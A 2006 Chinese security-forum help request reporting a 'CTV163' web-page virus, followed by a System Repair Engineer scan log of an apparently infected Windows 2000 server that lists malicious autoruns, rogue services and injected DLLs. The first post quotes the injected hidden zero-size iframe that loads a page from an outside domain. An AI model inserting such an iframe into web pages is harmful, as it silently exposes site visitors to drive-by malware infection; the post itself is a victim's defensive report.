CTV163网页病毒 bbs.ikaka.com

sys767767 - 2006-12-26 9:10:00

网页植入
<iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>

[CODE]

2006-12-26,08:42:34

System Repair Engineer 2.3.13.690
Smallfrogs (http://www.KZTechs.com)

Windows 2000 Professional Service Pack 4 (Build 2195)
- 管理权限用户 - 完整功能

以下内容被选中：
所有的启动项目（包括注册表、启动文件夹、服务等）
浏览器加载项
正在运行的进程（包括进程模块信息）
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件

启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><ctfmon.exe> [Microsoft Corporation]
<svc><C:\DOCUME~1\yinhe456\LOCALS~1\Temp\qiang1.exe> [Microsoft Corporation]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><C:\WINNT\rundl132.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Synchronization Manager><mobsync.exe /logon> [(Verified)Microsoft Corporation]
<ESMgr><C:\Program Files\Cesoft\Excel Server\ESMgr.exe> [cesoft]
<runeip><C:\Program Files\Rising\AntiSpyware\runiep.exe> [Beijing Rising Technology Co., Ltd.]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Corporation]
<Userinit><C:\WINNT\system32\userinit.exe,devgt.exe> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{C54C4AFB-8A2A-6C1E-BA4D-C20F02941223}><C:\WINNT\system32\SVCHOST.dll> [N/A]
[HKEY_CURRENT_USER\Control Panel\Desktop]
<SCRNSAVE.EXE><C:\WINNT\system32\ssbezier.scr> [(Verified)Microsoft Corporation]

==================================
启动文件夹
[服务管理器]
<C:\Documents and Settings\All Users\「开始」菜单\程序\启动\服务管理器.lnk --> C:\PROGRA~1\MICROS~4\80\Tools\Binn\sqlmangr.exe [Microsoft Corporation]><N>
[启动IE防漏墙 (2)]
<C:\Documents and Settings\yinhe456\「开始」菜单\程序\启动\启动IE防漏墙 (2).lnk --> C:\PROGRA~1\Rising\ANTISP~1\runiep.exe [Beijing Rising Technology Co., Ltd.]><N>

==================================
服务
[Logical Disk Manager Administrative Service / dmadmin][Stopped/Manual Start]
<C:\WINNT\System32\dmadmin.exe /com><VERITAS Software Corp.>
[IMA_Server / IMA_Server][Running/Auto Start]
<d:\MYOA\IMA\IMAServer.exe><N/A>
[MeChat / MeChat][Running/Auto Start]
<d:\MYOA\MeChat\MeChat.exe><N/A>
[MSSQLSERVER / MSSQLSERVER][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe -sMSSQLSERVER><Microsoft Corporation>
[MSSQLServerADHelper / MSSQLServerADHelper][Stopped/Manual Start]
<C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe><>
[MySQL / MySQL][Running/Auto Start]
<D:\MYOA\mysql\bin\mysqld-nt.exe MySQL><N/A>
[Office_Anywhere / Office_Anywhere][Running/Auto Start]
<"d:\MYOA\bin\apache.exe" -k runservice><Apache Software Foundation>
[SQLSERVERAGENT / SQLSERVERAGENT][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.EXE -i MSSQLSERVER><Microsoft Corporation>
[Windows DHCP Service / WinDHCPsvc][Stopped/Auto Start]
<C:\WINNT\system32\rundll32.exe windhcp.ocx,start><Microsoft Corporation>
[WinXP DHCP Service / WinXPDHCPsvc][Stopped/Auto Start]
<C:\WINNT\system32\rundll32.exe xpdhcp.dll,start><Microsoft Corporation>

==================================
驱动程序
[atirage3 / atirage3][Running/Manual Start]
<System32\DRIVERS\atimpab.sys><ATI Technologies Inc.>
[dmboot / dmboot][Stopped/Disabled]
<System32\drivers\dmboot.sys><VERITAS Software Corp.>
[Logical Disk Manager Driver / dmio][Running/Boot Start]
<\SystemRoot\System32\drivers\dmio.sys><VERITAS Software Corp.>
[dmload / dmload][Running/Boot Start]
<\SystemRoot\System32\drivers\dmload.sys><VERITAS Software Corp.>
[Intel(R) PRO/1000 Adapter Driver / E1000][Running/Manual Start]
<System32\DRIVERS\e1000nt5.sys><Intel Corporation>
[Intel(R) PRO Adapter Driver / E100B][Running/Manual Start]
<System32\DRIVERS\e100bnt5.sys><Intel Corporation>
[HOSTNT / HOSTNT][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\hostnt.sys><N/A>
[MHDRV / MHDRV][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\mhdrv.sys><SafeNet China Ltd.>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<System32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[RCMHDOG / RCMHDOG][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\rcmhdog.sys><SafeNet China Ltd.>
[SafeNet MicroDog USB Device Driver / UsbC][Running/Manual Start]
<System32\Drivers\rcusbwdm.sys><SafeNet China Ltd.>
[squell / squell][Running/Manual Start]
<2 - 系统找不到指定的文件。
><N/A>
[Netgroup Packet Filter / NPF][Running/Manual Start]
<system32\DRIVERS\npf.sys><CACE Technologies>

==================================
浏览器加载项
[@shdoclc.dll,-866]
{c95fe080-8f5d-11d2-a20b-00aa003c157a} <, N/A>
[访问瑞星网站]
{FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} <http://www.rising.com.cn/?u=RSTB, N/A>
[访问卡卡社区]
{FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} <http://www.ikaka.com/?u=RSTB, N/A>
[电台(&R)]
{8E718888-423F-11D2-876E-00A0C9082467} <C:\WINNT\system32\msdxm.ocx, Microsoft Corporation>
[卡卡上网安全助手]
{DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINNT\system32\kakatool.dll, Beijing Rising Technology Co., Ltd.>
[导出到 Microsoft Excel(&x)]
<res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000, N/A>

==================================
正在运行的进程
[PID: 140][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.00.2195.6601]
[PID: 164][\??\C:\WINNT\system32\csrss.exe] [Microsoft Corporation, 5.00.2195.6601]
[PID: 160][\??\C:\WINNT\system32\winlogon.exe] [Microsoft Corporation, 5.00.2195.6898]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[PID: 212][C:\WINNT\system32\services.exe] [Microsoft Corporation, 5.00.2195.6700]
[C:\WINNT\system32\dmserver.dll] [VERITAS Software Corp., 2195.6605.297.3]
[PID: 224][C:\WINNT\system32\lsass.exe] [Microsoft Corporation, 5.00.2195.6902]
[PID: 400][C:\WINNT\system32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 424][C:\WINNT\system32\spoolsv.exe] [Microsoft Corporation, 5.00.2195.6659]
[PID: 456][C:\WINNT\System32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 484][d:\MYOA\MeChat\MeChat.exe] [N/A, N/A]
[PID: 548][C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\OPENDS60.DLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\UMS.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLSORT.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlevn70.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNETLIB.dll] [Microsoft Corporation, 2000.080.0766.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNMPN70.dll] [Microsoft Corporation, 2000.080.0534.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SSmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpsqlbot.dll] [Microsoft Corporation, 2000.080.0760.00]
[PID: 556][D:\MYOA\mysql\bin\mysqld-nt.exe] [N/A, N/A]

sys767767 - 2006-12-26 9:12:00

[PID: 584][d:\MYOA\bin\apache.exe] [Apache Software Foundation, 2.0.53]
[d:\MYOA\bin\libapr.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libaprutil.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libapriconv.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libhttpd.dll] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_access.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_actions.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_alias.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_asis.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_auth.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_autoindex.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_dir.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_env.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_include.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_log_config.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_mime.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_negotiation.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_setenvif.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_imap.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_cgi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_isapi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_file_cache.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\sapi\php4apache2.dll] [N/A, N/A]
[d:\MYOA\bin\php4ts.dll] [The PHP Group, 4.3.10.10]
[D:\MYOA\bin\sapi\mod_jk2.dll] [N/A, N/A]
[D:\MYOA\bin\mmcache.dll] [N/A, N/A]
[D:\MYOA\bin\ZendOptimizer.dll] [N/A, N/A]
[d:\MYOA\bin\php_gd2.dll] [N/A, N/A]
[PID: 652][C:\WINNT\system32\regsvc.exe] [Microsoft Corporation, 5.00.2195.6701]
[PID: 664][C:\WINNT\system32\MSTask.exe] [Microsoft Corporation, 4.71.2195.6704]
[PID: 736][C:\WINNT\System32\WBEM\WinMgmt.exe] [Microsoft Corporation, 1.50.1085.0100]
[PID: 760][C:\WINNT\system32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 776][d:\MYOA\IMA\IMAServer.exe] [N/A, N/A]
[d:\MYOA\IMA\crypt.dll] [N/A, N/A]
[d:\MYOA\IMA\CC3260MT.DLL] [Borland Corporation, 0.0.0.0 (informal build)]
[d:\MYOA\IMA\libmysql.dll] [N/A, N/A]
[PID: 916][C:\WINNT\Explorer.EXE] [Microsoft Corporation, 5.00.3700.6690]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[C:\WINNT\system32\msimtf.dll] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\xpdhcp.dll] [N/A, N/A]
[PID: 944][C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.EXE] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.0382.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\W95SCM.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SEMMAP.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\SEMMAP.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlagent.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLAGENT.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlcmdss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlcmdss.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlrepss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlrepss.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlatxss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlatxss.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\AXSCPHST.DLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\Resources\2052\AXSCPHST.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINNT\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[PID: 992][D:\MYOA\bin\apache.exe] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\libapr.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libaprutil.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libapriconv.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libhttpd.dll] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_access.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_actions.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_alias.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_asis.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_auth.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_autoindex.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_dir.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_env.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_include.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_log_config.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_mime.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_negotiation.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_setenvif.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_imap.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_cgi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_isapi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_file_cache.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\sapi\php4apache2.dll] [N/A, N/A]
[D:\MYOA\bin\php4ts.dll] [The PHP Group, 4.3.10.10]
[D:\MYOA\bin\sapi\mod_jk2.dll] [N/A, N/A]
[D:\MYOA\bin\mmcache.dll] [N/A, N/A]
[D:\MYOA\bin\ZendOptimizer.dll] [N/A, N/A]
[D:\MYOA\bin\php_gd2.dll] [N/A, N/A]

sys767767 - 2006-12-26 9:13:00

[PID: 2092][C:\Program Files\Cesoft\Excel Server\ESMgr.exe] [cesoft, 1.00]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Cesoft\Excel Server\ESSa.dll] [cesoft, 1.00]
[C:\WINNT\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\WINNT\system32\capicom.dll] [Microsoft Corporation, 2, 0, 0, 3]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2140][C:\WINNT\system32\ctfmon.exe] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\MSUTB.dll] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\mui\fallback\0804\msutb.dll.mui] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2160][C:\WINNT\system32\conime.exe] [Microsoft Corporation, 5.00.2195.6655]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[PID: 2180][C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\W95SCM.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.0382.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\Resources\2052\sqlmangr.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2100][D:\MYOA\bin\Monitor.exe] [Software Foundation, 2.0.45]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2172][C:\Program Files\Rising\AntiSpyware\runiep.exe] [Beijing Rising Technology Co., Ltd., 1, 0, 1, 3]
[C:\Program Files\Rising\AntiSpyware\iep_ctrl.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2520][C:\WINNT\system32\wuauclt.exe] [Microsoft Corporation, 5.4.3630.2554 built by: lab04_n]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 748][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2600.0000]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\kakatool.dll] [Beijing Rising Technology Co., Ltd., 2, 0, 2, 6]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\Dll.dll] [N/A, N/A]
[PID: 812][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2600.0000]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\kakatool.dll] [Beijing Rising Technology Co., Ltd., 2, 0, 2, 6]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2588][C:\WINNT\Logo1_.exe] [, 1.0.0.0]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2608][C:\WINNT\system32\devgt.exe] [N/A, N/A]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 892][C:\Documents and Settings\yinhe456\My Documents\sreng2\SREng.EXE] [Smallfrogs Studio, 2.3.13.690]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2796][C:\WINNT\system32\conime.exe] [Microsoft Corporation, 5.00.2195.6655]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\xpdhcp.dll] [N/A, N/A]

==================================
文件关联
.TXT OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM OK. ["C:\WINNT\hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS Error. [C:\WINNT\system32\WScript.exe "%1" %*]
.JS Error. [C:\WINNT\system32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1 localhost

==================================
API HOOK
N/A

==================================

[/CODE]

瑞星卡卡安全论坛